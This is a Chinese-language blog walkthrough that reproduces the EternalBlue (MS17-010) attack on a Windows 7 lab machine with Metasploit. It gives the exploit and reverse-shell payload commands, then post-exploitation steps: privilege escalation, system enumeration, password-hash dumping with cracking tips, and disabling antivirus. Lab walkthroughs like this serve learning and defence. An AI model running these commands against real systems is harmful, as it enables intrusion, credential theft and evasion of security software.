永恆之藍(ms17-010)漏洞復現,進行簡單後滲透信息收集

申明
本文章僅供學習使用


環境準備:
win7虛擬機(靶機)
ip:192.168.56.134

kali虛擬機(攻擊機)
ip:172.18.20.164

要求:win7虛擬機不要開防火牆,開放445端口,沒有打永恆之藍的補丁


實驗開始:
先用nmap掃描一下靶機開了哪幾個端口:

nmap -Sv -p 1-1000 192.168.56.134

在這裏插入圖片描述
跑了兩分鐘,發現win7着實開了445端口。接下來直接打開msfconsole來進行攻擊。
打開msfconsole會隨機跳出圖案,每一次打開都不一樣
打開msfconsole會隨機跳出圖案,每一次打開都不一樣。
接下來使用exploit/windows/smb/ms17_010_eternalblue模塊進行攻擊即可。

如果忘了模塊名問題也不大,直接搜索漏洞名字ms17-010即可:

search ms17-010

在這裏插入圖片描述
根據後面的等級(rank)來進行選擇即可。這裏使用exploit/windows/smb/ms17_010_eternalblue模塊哈,命令如下:

use exploit/windows/smb/ms17_010_eternalblue

使用show options命令查看我們需要設置啥參數:
在這裏插入圖片描述
首先,Required參數爲no的,設置或者不設置都行。但是參數爲yes的必須設置。看了一下,只有RHOSTS(靶機ip)需要設置。
我這邊由於端口4444已經被佔用了,於是設置爲1234。
設置參數:

set rhosts 192.168.56.134
set lport 1234
這裏命令對大小寫不敏感,隨意。

在這裏插入圖片描述
參數設置完畢,在攻擊之前設置一下payload:
set payload windows/x64/meterpreter/reverse_tcp
可以用run命令或者exploit命令運行:
在這裏插入圖片描述
看到meterpreter >就意味着已經攻下啦!接下來就是提權並且進行後滲透信息收集,這裏做一些簡單的介紹。


getuid 當前用戶的名字,這裏直接拿到了system權限
在這裏插入圖片描述
getsystem 不是system權限時,可以用這個命令拿到system權限(大多數情況下執行不通,需要利用漏洞進行提權,提權命令還是這個)
run post/windows/gather/forensics/enum_drives 檢查磁盤情況在這裏插入圖片描述
其實我是沒有D盤的,這裏指的是我有個D的驅動器(我也不知道爲啥有驅動器)
run post/windows/gather/checkvm 檢查是否爲虛擬機在這裏插入圖片描述
run post/windows/gather/enum_services 列出當前所有服務
run post/windows/gather/enum_applications 列出應用,並且想將詳細信息寫在下面那個路徑之下,可以cat一下查看:在這裏插入圖片描述
在這裏插入圖片描述
run post/windows/gather/dumplinks 列出最近的操作(我的虛擬機剛裝,所以沒啥操作,不然能列一大串)在這裏插入圖片描述
run post/windows/gather/enum_patches 列出所有補丁在這裏插入圖片描述
以上方法複雜,費時。利用run scraper命令,執行一個腳本,自動將所有你想收集的信息收集一遍,然後存儲/root/.msf4/logs/scripts/scraper/下,具體命名爲靶機ip+當前日期:在這裏插入圖片描述
在這裏插入圖片描述
在這裏插入圖片描述
基本上你想要的信息都在這裏了:
cat hashes.txt這裏存放着所有用戶的密碼的哈希值,存放格式爲LM : NTLM格式,可以利用撞庫進行破解。其他的文件有興趣的自己查看哈~·在這裏插入圖片描述
run post/windows/gather/hashdump 跟msf內置的庫進行對比,對上了就呈現出來,對不上就呈現哈希值:在這裏插入圖片描述
我的密碼比較簡單,直接就給我跑出來了,打個碼哈~
跑不出來的哈希值可以去www.cmd5.com去破解,簡單的直接出來,難的需要付費,一毛錢。

run killav關掉殺毒軟件
run post/windows/manage/killava 同上

命令有很多,我整理的就辣麼一點,喜歡的點贊關注收藏一波哈,希望能幫到你們~


最後:互聯網不是法外之地,大家且行且珍惜~

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章